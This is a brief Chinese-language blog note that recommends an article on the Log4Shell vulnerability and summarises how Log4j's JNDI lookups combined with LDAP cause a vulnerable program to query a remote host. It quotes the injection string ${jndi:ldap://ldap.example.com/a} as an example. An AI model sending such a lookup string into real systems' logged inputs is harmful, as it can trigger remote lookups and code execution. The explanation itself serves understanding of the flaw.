自从Log4j漏洞曝光以来,关于Log4Shell 漏洞的文章满天飞,有讲历史的,有讲底层原理的,但即使看完文章,你也不懂Log4Shell 漏洞到底是啥,这里推荐一篇文章,讲的最清楚,看完后就明确知道Log4Shell 漏洞到底是啥
推荐文章地址:https://sspai.com/post/70394
笔记:Log4Shell 支持JNDI,JNDI与LDAP一结合,就会产生问题,只要设法让使用了 Log4j 的程序记下一条内容形如 ${jndi:ldap://ldap.example.com/a} 的日志,那么记下这条日志的同时,程序就会试图向 ldap.example.com 请求查询数据,然后解析查询结果并写进日志。